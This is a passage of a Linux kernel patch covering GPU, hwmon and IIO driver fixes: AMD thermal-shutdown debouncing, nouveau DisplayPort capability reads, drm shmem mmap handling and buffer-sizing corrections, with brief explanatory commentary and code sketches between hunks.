+diff --git a/drivers/gpu/drm/amd/pm/powerplay/inc/power_state.h b/drivers/gpu/drm/amd/pm/powerplay/inc/power_state.h
+index a5f2227a3971c..0ffc2347829d0 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/inc/power_state.h
++++ b/drivers/gpu/drm/amd/pm/powerplay/inc/power_state.h
+@@ -131,6 +131,7 @@ struct PP_TemperatureRange {
+ 	int mem_min;
+ 	int mem_crit_max;
+ 	int mem_emergency_max;
++	int sw_ctf_threshold;
+ };
+ 
+ struct PP_StateValidationBlock {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 91dfc229e34d7..d191ff52d4f06 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -24,6 +24,7 @@
+ 
+ #include <linux/firmware.h>
+ #include <linux/pci.h>
++#include <linux/reboot.h>
+ 
+ #include "amdgpu.h"
+ #include "amdgpu_smu.h"
+@@ -1061,6 +1062,34 @@ static void smu_interrupt_work_fn(struct work_struct *work)
+ 		smu->ppt_funcs->interrupt_work(smu);
+ }
+ 
++static void smu_swctf_delayed_work_handler(struct work_struct *work)
++{
++	struct smu_context *smu =
++		container_of(work, struct smu_context, swctf_delayed_work.work);
++	struct smu_temperature_range *range =
++				&smu->thermal_range;
++	struct amdgpu_device *adev = smu->adev;
++	uint32_t hotspot_tmp, size;
++
++	/*
++	 * If the hotspot temperature is confirmed as below SW CTF setting point
++	 * after the delay enforced, nothing will be done.
++	 * Otherwise, a graceful shutdown will be performed to prevent further damage.
++	 */
++	if (range->software_shutdown_temp &&
++	    smu->ppt_funcs->read_sensor &&
++	    !smu->ppt_funcs->read_sensor(smu,
++					 AMDGPU_PP_SENSOR_HOTSPOT_TEMP,
++					 &hotspot_tmp,
++					 &size) &&
++	    hotspot_tmp / 1000 < range->software_shutdown_temp)
++		return;
++
++	dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
++	dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
++	orderly_poweroff(true);
++}
++
+ static int smu_sw_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+@@ -1109,6 +1138,9 @@ static int smu_sw_init(void *handle)
+ 		return ret;
+ 	}
+ 
++	INIT_DELAYED_WORK(&smu->swctf_delayed_work,
++			  smu_swctf_delayed_work_handler);
++
+ 	ret = smu_smc_table_sw_init(smu);
+ 	if (ret) {
+ 		dev_err(adev->dev, "Failed to sw init smc table!\n");
+@@ -1581,6 +1613,8 @@ static int smu_smc_hw_cleanup(struct smu_context *smu)
+ 		return ret;
+ 	}
+ 
++	cancel_delayed_work_sync(&smu->swctf_delayed_work);
++
+ 	ret = smu_disable_dpms(smu);
+ 	if (ret) {
+ 		dev_err(adev->dev, "Fail to disable dpm features!\n");
+@@ -2520,6 +2554,14 @@ static int smu_read_sensor(void *handle,
+ 		*((uint32_t *)data) = pstate_table->uclk_pstate.standard * 100;
+ 		*size = 4;
+ 		break;
++	case AMDGPU_PP_SENSOR_PEAK_PSTATE_SCLK:
++		*((uint32_t *)data) = pstate_table->gfxclk_pstate.peak * 100;
++		*size = 4;
++		break;
++	case AMDGPU_PP_SENSOR_PEAK_PSTATE_MCLK:
++		*((uint32_t *)data) = pstate_table->uclk_pstate.peak * 100;
++		*size = 4;
++		break;
+ 	case AMDGPU_PP_SENSOR_ENABLED_SMC_FEATURES_MASK:
+ 		ret = smu_feature_get_enabled_mask(smu, (uint64_t *)data);
+ 		*size = 8;
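For readers tracking the SW CTF rework above: the thermal interrupt no longer powers the box off on the spot; it schedules a delayed work item that re-reads the hotspot sensor and only escalates if the temperature is still over the shutdown threshold. A minimal sketch of that debounce pattern follows; my_dev, read_temp and MY_RECHECK_DELAY_MS are hypothetical stand-ins, not the driver's own names.

#include <linux/workqueue.h>
#include <linux/jiffies.h>
#include <linux/reboot.h>

#define MY_RECHECK_DELAY_MS 50			/* hypothetical debounce delay */

struct my_dev {
	struct delayed_work overtemp_work;
	int shutdown_temp;			/* degrees C */
	int (*read_temp)(struct my_dev *dev);	/* degrees C or -errno */
};

static void my_overtemp_work_fn(struct work_struct *work)
{
	struct my_dev *dev = container_of(work, struct my_dev,
					  overtemp_work.work);
	int temp = dev->read_temp(dev);

	/* The reading recovered below the threshold: treat the event
	 * as transient and do nothing.
	 */
	if (temp >= 0 && temp < dev->shutdown_temp)
		return;

	orderly_poweroff(true);
}

/* Called from the thermal interrupt instead of powering off directly. */
static void my_overtemp_irq(struct my_dev *dev)
{
	schedule_delayed_work(&dev->overtemp_work,
			      msecs_to_jiffies(MY_RECHECK_DELAY_MS));
}

Setup pairs INIT_DELAYED_WORK() with a cancel_delayed_work_sync() in the teardown path, exactly as the hunks above add to smu_sw_init() and smu_smc_hw_cleanup().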
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+index 3bc4128a22ac2..1ab77a6cdb653 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+@@ -573,6 +573,8 @@ struct smu_context
+ 	u32 debug_param_reg;
+ 	u32 debug_msg_reg;
+ 	u32 debug_resp_reg;
++
++	struct delayed_work		swctf_delayed_work;
+ };
+ 
+ struct i2c_adapter;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+index ad5f6a15a1d7d..d490b571c8ffa 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+@@ -1438,13 +1438,8 @@ static int smu_v11_0_irq_process(struct amdgpu_device *adev,
+ 	if (client_id == SOC15_IH_CLIENTID_THM) {
+ 		switch (src_id) {
+ 		case THM_11_0__SRCID__THM_DIG_THERM_L2H:
+-			dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
+-			/*
+-			 * SW CTF just occurred.
+-			 * Try to do a graceful shutdown to prevent further damage.
+-			 */
+-			dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
+-			orderly_poweroff(true);
++			schedule_delayed_work(&smu->swctf_delayed_work,
++					      msecs_to_jiffies(AMDGPU_SWCTF_EXTRA_DELAY));
+ 		break;
+ 		case THM_11_0__SRCID__THM_DIG_THERM_H2L:
+ 			dev_emerg(adev->dev, "ERROR: GPU under temperature range detected\n");
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 47fafb1fa6088..3104d49379090 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -1386,13 +1386,8 @@ static int smu_v13_0_irq_process(struct amdgpu_device *adev,
+ 	if (client_id == SOC15_IH_CLIENTID_THM) {
+ 		switch (src_id) {
+ 		case THM_11_0__SRCID__THM_DIG_THERM_L2H:
+-			dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
+-			/*
+-			 * SW CTF just occurred.
+-			 * Try to do a graceful shutdown to prevent further damage.
+-			 */
+-			dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
+-			orderly_poweroff(true);
++			schedule_delayed_work(&smu->swctf_delayed_work,
++					      msecs_to_jiffies(AMDGPU_SWCTF_EXTRA_DELAY));
+ 			break;
+ 		case THM_11_0__SRCID__THM_DIG_THERM_H2L:
+ 			dev_emerg(adev->dev, "ERROR: GPU under temperature range detected\n");
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index 5fdc608043e76..e33f06bb66eb4 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -622,7 +622,13 @@ int drm_gem_shmem_mmap(struct drm_gem_shmem_object *shmem, struct vm_area_struct
+ 	int ret;
+ 
+ 	if (obj->import_attach) {
++		/* Reset both vm_ops and vm_private_data, so we don't end up with
++		 * vm_ops pointing to our implementation if the dma-buf backend
++		 * doesn't set those fields.
++		 */
+ 		vma->vm_private_data = NULL;
++		vma->vm_ops = NULL;
++
+ 		ret = dma_buf_mmap(obj->dma_buf, vma, 0);
+ 
+ 		/* Drop the reference drm_gem_mmap_obj() acquired.*/
+diff --git a/drivers/gpu/drm/nouveau/nouveau_connector.c b/drivers/gpu/drm/nouveau/nouveau_connector.c
+index f40310559d13f..49c5451cdfb16 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_connector.c
++++ b/drivers/gpu/drm/nouveau/nouveau_connector.c
+@@ -967,7 +967,7 @@ nouveau_connector_get_modes(struct drm_connector *connector)
+ 	/* Determine display colour depth for everything except LVDS now,
+ 	 * DP requires this before mode_valid() is called.
+ 	 */
+-	if (connector->connector_type != DRM_MODE_CONNECTOR_LVDS && nv_connector->native_mode)
++	if (connector->connector_type != DRM_MODE_CONNECTOR_LVDS)
+ 		nouveau_connector_detect_depth(connector);
+ 
+ 	/* Find the native mode if this is a digital panel, if we didn't
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/disp/dp.c b/drivers/gpu/drm/nouveau/nvkm/engine/disp/dp.c
+index c1b3206f27e64..458f8efb19c6c 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/disp/dp.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/disp/dp.c
+@@ -26,6 +26,8 @@
+ #include "head.h"
+ #include "ior.h"
+ 
++#include <drm/display/drm_dp.h>
++
+ #include <subdev/bios.h>
+ #include <subdev/bios/init.h>
+ #include <subdev/gpio.h>
+@@ -474,6 +476,50 @@ nvkm_dp_train(struct nvkm_outp *outp, u32 dataKBps)
+ 	return ret;
+ }
+ 
++/* XXX: This is a big fat hack, and this is just drm_dp_read_dpcd_caps()
++ * converted to work inside nvkm. This is a temporary holdover until we start
++ * passing the drm_dp_aux device through NVKM
++ */
++static int
++nvkm_dp_read_dpcd_caps(struct nvkm_outp *outp)
++{
++	struct nvkm_i2c_aux *aux = outp->dp.aux;
++	u8 dpcd_ext[DP_RECEIVER_CAP_SIZE];
++	int ret;
++
++	ret = nvkm_rdaux(aux, DPCD_RC00_DPCD_REV, outp->dp.dpcd, DP_RECEIVER_CAP_SIZE);
++	if (ret < 0)
++		return ret;
++
++	/*
++	 * Prior to DP1.3 the bit represented by
++	 * DP_EXTENDED_RECEIVER_CAP_FIELD_PRESENT was reserved.
++	 * If it is set DP_DPCD_REV at 0000h could be at a value less than
++	 * the true capability of the panel. The only way to check is to
++	 * then compare 0000h and 2200h.
++	 */
++	if (!(outp->dp.dpcd[DP_TRAINING_AUX_RD_INTERVAL] &
++	      DP_EXTENDED_RECEIVER_CAP_FIELD_PRESENT))
++		return 0;
++
++	ret = nvkm_rdaux(aux, DP_DP13_DPCD_REV, dpcd_ext, sizeof(dpcd_ext));
++	if (ret < 0)
++		return ret;
++
++	if (outp->dp.dpcd[DP_DPCD_REV] > dpcd_ext[DP_DPCD_REV]) {
++		OUTP_DBG(outp, "Extended DPCD rev less than base DPCD rev (%d > %d)\n",
++			 outp->dp.dpcd[DP_DPCD_REV], dpcd_ext[DP_DPCD_REV]);
++		return 0;
++	}
++
++	if (!memcmp(outp->dp.dpcd, dpcd_ext, sizeof(dpcd_ext)))
++		return 0;
++
++	memcpy(outp->dp.dpcd, dpcd_ext, sizeof(dpcd_ext));
++
++	return 0;
++}
++
+ void
+ nvkm_dp_disable(struct nvkm_outp *outp, struct nvkm_ior *ior)
+ {
+@@ -630,7 +676,7 @@ nvkm_dp_enable(struct nvkm_outp *outp, bool enable)
+ 			memset(outp->dp.lttpr, 0x00, sizeof(outp->dp.lttpr));
+ 		}
+ 
+-		if (!nvkm_rdaux(aux, DPCD_RC00_DPCD_REV, outp->dp.dpcd, sizeof(outp->dp.dpcd))) {
++		if (!nvkm_dp_read_dpcd_caps(outp)) {
+ 			const u8 rates[] = { 0x1e, 0x14, 0x0a, 0x06, 0 };
+ 			const u8 *rate;
+ 			int rate_max;
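The comment above is explicit that nvkm_dp_read_dpcd_caps() is drm_dp_read_dpcd_caps() transplanted into nvkm because no struct drm_dp_aux is plumbed through yet. For comparison, this is roughly what the helper-based path looks like for a driver that does have an aux channel; the function name example_read_caps is illustrative only.

#include <drm/display/drm_dp_helper.h>

static int example_read_caps(struct drm_dp_aux *aux)
{
	u8 dpcd[DP_RECEIVER_CAP_SIZE];
	int ret;

	/* Performs the same base-vs-extended dance as the hack above:
	 * read from 0x0000, and if DP_EXTENDED_RECEIVER_CAP_FIELD_PRESENT
	 * is set, re-read from 0x2200 and keep the block reporting the
	 * newer DPCD revision.
	 */
	ret = drm_dp_read_dpcd_caps(aux, dpcd);
	if (ret < 0)
		return ret;

	return 0;
}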
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgf100.h b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgf100.h
+index 32bbddc0993e8..679aff79f4d6b 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgf100.h
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgf100.h
+@@ -123,6 +123,7 @@ void gk104_grctx_generate_r418800(struct gf100_gr *);
+ 
+ extern const struct gf100_grctx_func gk110_grctx;
+ void gk110_grctx_generate_r419eb0(struct gf100_gr *);
++void gk110_grctx_generate_r419f78(struct gf100_gr *);
+ 
+ extern const struct gf100_grctx_func gk110b_grctx;
+ extern const struct gf100_grctx_func gk208_grctx;
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk104.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk104.c
+index 304e9d268bad4..f894f82548242 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk104.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk104.c
+@@ -916,7 +916,9 @@ static void
+ gk104_grctx_generate_r419f78(struct gf100_gr *gr)
+ {
+ 	struct nvkm_device *device = gr->base.engine.subdev.device;
+-	nvkm_mask(device, 0x419f78, 0x00000001, 0x00000000);
++
++	/* bit 3 set disables loads in fp helper invocations, we need it enabled */
++	nvkm_mask(device, 0x419f78, 0x00000009, 0x00000000);
+ }
+ 
+ void
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110.c
+index 86547cfc38dce..e88740d4e54d4 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110.c
+@@ -820,6 +820,15 @@ gk110_grctx_generate_r419eb0(struct gf100_gr *gr)
+ 	nvkm_mask(device, 0x419eb0, 0x00001000, 0x00001000);
+ }
+ 
++void
++gk110_grctx_generate_r419f78(struct gf100_gr *gr)
++{
++	struct nvkm_device *device = gr->base.engine.subdev.device;
++
++	/* bit 3 set disables loads in fp helper invocations, we need it enabled */
++	nvkm_mask(device, 0x419f78, 0x00000008, 0x00000000);
++}
++
+ const struct gf100_grctx_func
+ gk110_grctx = {
+ 	.main  = gf100_grctx_generate_main,
+@@ -852,4 +861,5 @@ gk110_grctx = {
+ 	.gpc_tpc_nr = gk104_grctx_generate_gpc_tpc_nr,
+ 	.r418800 = gk104_grctx_generate_r418800,
+ 	.r419eb0 = gk110_grctx_generate_r419eb0,
++	.r419f78 = gk110_grctx_generate_r419f78,
+ };
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110b.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110b.c
+index ebb947bd1446b..086e4d49e1121 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110b.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk110b.c
+@@ -101,4 +101,5 @@ gk110b_grctx = {
+ 	.gpc_tpc_nr = gk104_grctx_generate_gpc_tpc_nr,
+ 	.r418800 = gk104_grctx_generate_r418800,
+ 	.r419eb0 = gk110_grctx_generate_r419eb0,
++	.r419f78 = gk110_grctx_generate_r419f78,
+ };
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk208.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk208.c
+index 4d40512b5c998..0bf438c3f7cbc 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk208.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgk208.c
+@@ -566,4 +566,5 @@ gk208_grctx = {
+ 	.dist_skip_table = gf117_grctx_generate_dist_skip_table,
+ 	.gpc_tpc_nr = gk104_grctx_generate_gpc_tpc_nr,
+ 	.r418800 = gk104_grctx_generate_r418800,
++	.r419f78 = gk110_grctx_generate_r419f78,
+ };
+diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgm107.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgm107.c
+index 0b3964e6b36e2..acdf0932a99e1 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgm107.c
++++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/ctxgm107.c
+@@ -991,4 +991,5 @@ gm107_grctx = {
+ 	.r406500 = gm107_grctx_generate_r406500,
+ 	.gpc_tpc_nr = gk104_grctx_generate_gpc_tpc_nr,
+ 	.r419e00 = gm107_grctx_generate_r419e00,
++	.r419f78 = gk110_grctx_generate_r419f78,
+ };
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index 9fea03121247e..2e2e08f4359a8 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -836,12 +836,12 @@ static int vop_plane_atomic_check(struct drm_plane *plane,
+ 	 * need align with 2 pixel.
+ 	 */
+ 	if (fb->format->is_yuv && ((new_plane_state->src.x1 >> 16) % 2)) {
+-		DRM_ERROR("Invalid Source: Yuv format not support odd xpos\n");
++		DRM_DEBUG_KMS("Invalid Source: Yuv format not support odd xpos\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (fb->format->is_yuv && new_plane_state->rotation & DRM_MODE_REFLECT_Y) {
+-		DRM_ERROR("Invalid Source: Yuv format does not support this rotation\n");
++		DRM_DEBUG_KMS("Invalid Source: Yuv format does not support this rotation\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -849,7 +849,7 @@ static int vop_plane_atomic_check(struct drm_plane *plane,
+ 		struct vop *vop = to_vop(crtc);
+ 
+ 		if (!vop->data->afbc) {
+-			DRM_ERROR("vop does not support AFBC\n");
++			DRM_DEBUG_KMS("vop does not support AFBC\n");
+ 			return -EINVAL;
+ 		}
+ 
+@@ -858,15 +858,16 @@ static int vop_plane_atomic_check(struct drm_plane *plane,
+ 			return ret;
+ 
+ 		if (new_plane_state->src.x1 || new_plane_state->src.y1) {
+-			DRM_ERROR("AFBC does not support offset display, xpos=%d, ypos=%d, offset=%d\n",
+-				  new_plane_state->src.x1,
+-				  new_plane_state->src.y1, fb->offsets[0]);
++			DRM_DEBUG_KMS("AFBC does not support offset display, " \
++				      "xpos=%d, ypos=%d, offset=%d\n",
++				      new_plane_state->src.x1, new_plane_state->src.y1,
++				      fb->offsets[0]);
+ 			return -EINVAL;
+ 		}
+ 
+ 		if (new_plane_state->rotation && new_plane_state->rotation != DRM_MODE_ROTATE_0) {
+-			DRM_ERROR("No rotation support in AFBC, rotation=%d\n",
+-				  new_plane_state->rotation);
++			DRM_DEBUG_KMS("No rotation support in AFBC, rotation=%d\n",
++				      new_plane_state->rotation);
+ 			return -EINVAL;
+ 		}
+ 	}
+diff --git a/drivers/hwmon/pmbus/bel-pfe.c b/drivers/hwmon/pmbus/bel-pfe.c
+index 4100eefb7ac32..61c195f8fd3b8 100644
+--- a/drivers/hwmon/pmbus/bel-pfe.c
++++ b/drivers/hwmon/pmbus/bel-pfe.c
+@@ -17,12 +17,13 @@
+ enum chips {pfe1100, pfe3000};
+ 
+ /*
+- * Disable status check for pfe3000 devices, because some devices report
+- * communication error (invalid command) for VOUT_MODE command (0x20)
+- * although correct VOUT_MODE (0x16) is returned: it leads to incorrect
+- * exponent in linear mode.
++ * Disable status check because some devices report communication error
++ * (invalid command) for VOUT_MODE command (0x20) although the correct
++ * VOUT_MODE (0x16) is returned: it leads to incorrect exponent in linear
++ * mode.
++ * This affects both pfe3000 and pfe1100.
+  */
+-static struct pmbus_platform_data pfe3000_plat_data = {
++static struct pmbus_platform_data pfe_plat_data = {
+ 	.flags = PMBUS_SKIP_STATUS_CHECK,
+ };
+ 
+@@ -94,16 +95,15 @@ static int pfe_pmbus_probe(struct i2c_client *client)
+ 	int model;
+ 
+ 	model = (int)i2c_match_id(pfe_device_id, client)->driver_data;
++	client->dev.platform_data = &pfe_plat_data;
+ 
+ 	/*
+ 	 * PFE3000-12-069RA devices may not stay in page 0 during device
+ 	 * probe which leads to probe failure (read status word failed).
+ 	 * So let's set the device to page 0 at the beginning.
+ 	 */
+-	if (model == pfe3000) {
+-		client->dev.platform_data = &pfe3000_plat_data;
++	if (model == pfe3000)
+ 		i2c_smbus_write_byte_data(client, PMBUS_PAGE, 0);
+-	}
+ 
+ 	return pmbus_do_probe(client, &pfe_driver_info[model]);
+ }
+diff --git a/drivers/iio/adc/ad7192.c b/drivers/iio/adc/ad7192.c
+index 8720ac43a4a4a..80eff7090f14a 100644
+--- a/drivers/iio/adc/ad7192.c
++++ b/drivers/iio/adc/ad7192.c
+@@ -62,7 +62,6 @@
+ #define AD7192_MODE_STA_MASK	BIT(20) /* Status Register transmission Mask */
+ #define AD7192_MODE_CLKSRC(x)	(((x) & 0x3) << 18) /* Clock Source Select */
+ #define AD7192_MODE_SINC3	BIT(15) /* SINC3 Filter Select */
+-#define AD7192_MODE_ACX		BIT(14) /* AC excitation enable(AD7195 only)*/
+ #define AD7192_MODE_ENPAR	BIT(13) /* Parity Enable */
+ #define AD7192_MODE_CLKDIV	BIT(12) /* Clock divide by 2 (AD7190/2 only)*/
+ #define AD7192_MODE_SCYCLE	BIT(11) /* Single cycle conversion */
+@@ -91,6 +90,7 @@
+ /* Configuration Register Bit Designations (AD7192_REG_CONF) */
+ 
+ #define AD7192_CONF_CHOP	BIT(23) /* CHOP enable */
++#define AD7192_CONF_ACX		BIT(22) /* AC excitation enable(AD7195 only) */
+ #define AD7192_CONF_REFSEL	BIT(20) /* REFIN1/REFIN2 Reference Select */
+ #define AD7192_CONF_CHAN(x)	((x) << 8) /* Channel select */
+ #define AD7192_CONF_CHAN_MASK	(0x7FF << 8) /* Channel select mask */
+@@ -473,7 +473,7 @@ static ssize_t ad7192_show_ac_excitation(struct device *dev,
+ 	struct iio_dev *indio_dev = dev_to_iio_dev(dev);
+ 	struct ad7192_state *st = iio_priv(indio_dev);
+ 
+-	return sysfs_emit(buf, "%d\n", !!(st->mode & AD7192_MODE_ACX));
++	return sysfs_emit(buf, "%d\n", !!(st->conf & AD7192_CONF_ACX));
+ }
+ 
+ static ssize_t ad7192_show_bridge_switch(struct device *dev,
+@@ -514,13 +514,13 @@ static ssize_t ad7192_set(struct device *dev,
+ 
+ 		ad_sd_write_reg(&st->sd, AD7192_REG_GPOCON, 1, st->gpocon);
+ 		break;
+-	case AD7192_REG_MODE:
++	case AD7192_REG_CONF:
+ 		if (val)
+-			st->mode |= AD7192_MODE_ACX;
++			st->conf |= AD7192_CONF_ACX;
+ 		else
+-			st->mode &= ~AD7192_MODE_ACX;
++			st->conf &= ~AD7192_CONF_ACX;
+ 
+-		ad_sd_write_reg(&st->sd, AD7192_REG_MODE, 3, st->mode);
++		ad_sd_write_reg(&st->sd, AD7192_REG_CONF, 3, st->conf);
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+@@ -580,12 +580,11 @@ static IIO_DEVICE_ATTR(bridge_switch_en, 0644,
+ 
+ static IIO_DEVICE_ATTR(ac_excitation_en, 0644,
+ 		       ad7192_show_ac_excitation, ad7192_set,
+-		       AD7192_REG_MODE);
++		       AD7192_REG_CONF);
+ 
+ static struct attribute *ad7192_attributes[] = {
+ 	&iio_dev_attr_filter_low_pass_3db_frequency_available.dev_attr.attr,
+ 	&iio_dev_attr_bridge_switch_en.dev_attr.attr,
+-	&iio_dev_attr_ac_excitation_en.dev_attr.attr,
+ 	NULL
+ };
+ 
+@@ -596,6 +595,7 @@ static const struct attribute_group ad7192_attribute_group = {
+ static struct attribute *ad7195_attributes[] = {
+ 	&iio_dev_attr_filter_low_pass_3db_frequency_available.dev_attr.attr,
+ 	&iio_dev_attr_bridge_switch_en.dev_attr.attr,
++	&iio_dev_attr_ac_excitation_en.dev_attr.attr,
+ 	NULL
+ };
+ 
+diff --git a/drivers/iio/adc/ina2xx-adc.c b/drivers/iio/adc/ina2xx-adc.c
+index 910e7e965fc48..74092f3836b83 100644
+--- a/drivers/iio/adc/ina2xx-adc.c
++++ b/drivers/iio/adc/ina2xx-adc.c
+@@ -124,6 +124,7 @@ static const struct regmap_config ina2xx_regmap_config = {
+ enum ina2xx_ids { ina219, ina226 };
+ 
+ struct ina2xx_config {
++	const char *name;
+ 	u16 config_default;
+ 	int calibration_value;
+ 	int shunt_voltage_lsb;	/* nV */
+@@ -155,6 +156,7 @@ struct ina2xx_chip_info {
+ 
+ static const struct ina2xx_config ina2xx_config[] = {
+ 	[ina219] = {
++		.name = "ina219",
+ 		.config_default = INA219_CONFIG_DEFAULT,
+ 		.calibration_value = 4096,
+ 		.shunt_voltage_lsb = 10000,
+@@ -164,6 +166,7 @@ static const struct ina2xx_config ina2xx_config[] = {
+ 		.chip_id = ina219,
+ 	},
+ 	[ina226] = {
++		.name = "ina226",
+ 		.config_default = INA226_CONFIG_DEFAULT,
+ 		.calibration_value = 2048,
+ 		.shunt_voltage_lsb = 2500,
+@@ -996,7 +999,7 @@ static int ina2xx_probe(struct i2c_client *client,
+ 	/* Patch the current config register with default. */
+ 	val = chip->config->config_default;
+ 
+-	if (id->driver_data == ina226) {
++	if (type == ina226) {
+ 		ina226_set_average(chip, INA226_DEFAULT_AVG, &val);
+ 		ina226_set_int_time_vbus(chip, INA226_DEFAULT_IT, &val);
+ 		ina226_set_int_time_vshunt(chip, INA226_DEFAULT_IT, &val);
+@@ -1015,7 +1018,7 @@ static int ina2xx_probe(struct i2c_client *client,
+ 	}
+ 
+ 	indio_dev->modes = INDIO_DIRECT_MODE;
+-	if (id->driver_data == ina226) {
++	if (type == ina226) {
+ 		indio_dev->channels = ina226_channels;
+ 		indio_dev->num_channels = ARRAY_SIZE(ina226_channels);
+ 		indio_dev->info = &ina226_info;
+@@ -1024,7 +1027,7 @@ static int ina2xx_probe(struct i2c_client *client,
+ 		indio_dev->num_channels = ARRAY_SIZE(ina219_channels);
+ 		indio_dev->info = &ina219_info;
+ 	}
+-	indio_dev->name = id->name;
++	indio_dev->name = id ? id->name : chip->config->name;
+ 
+ 	ret = devm_iio_kfifo_buffer_setup(&client->dev, indio_dev,
+ 					  &ina2xx_setup_ops);
+diff --git a/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c b/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
+index 05a28d353e343..d98f7e4d202c1 100644
+--- a/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
++++ b/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
+@@ -253,7 +253,7 @@ int cros_ec_sensors_core_init(struct platform_device *pdev,
+ 	platform_set_drvdata(pdev, indio_dev);
+ 
+ 	state->ec = ec->ec_dev;
+-	state->msg = devm_kzalloc(&pdev->dev,
++	state->msg = devm_kzalloc(&pdev->dev, sizeof(*state->msg) +
+ 				max((u16)sizeof(struct ec_params_motion_sense),
+ 				state->ec->max_response), GFP_KERNEL);
+ 	if (!state->msg)
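The cros_ec fix above is the classic header-plus-payload sizing bug: the allocation has to cover sizeof(*msg) in addition to the largest payload in either direction, otherwise the payload overruns the buffer. A hedged, generic sketch with a made-up message struct:

#include <linux/device.h>
#include <linux/minmax.h>
#include <linux/slab.h>

struct my_msg {
	u16 command;
	u16 insize;
	u8 data[];	/* payload follows the fixed header */
};

static struct my_msg *my_msg_alloc(struct device *dev, size_t max_params,
				   size_t max_response)
{
	/* Fixed header plus the larger of the two payload directions. */
	return devm_kzalloc(dev, sizeof(struct my_msg) +
				 max(max_params, max_response), GFP_KERNEL);
}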
+diff --git a/drivers/iio/frequency/admv1013.c b/drivers/iio/frequency/admv1013.c
+index ed81672713586..e6311213f3e89 100644
+--- a/drivers/iio/frequency/admv1013.c
++++ b/drivers/iio/frequency/admv1013.c
+@@ -344,9 +344,12 @@ static int admv1013_update_quad_filters(struct admv1013_state *st)
+ 
+ static int admv1013_update_mixer_vgate(struct admv1013_state *st)
+ {
+-	unsigned int vcm, mixer_vgate;
++	unsigned int mixer_vgate;
++	int vcm;
+ 
+ 	vcm = regulator_get_voltage(st->reg);
++	if (vcm < 0)
++		return vcm;
+ 
+ 	if (vcm < 1800000)
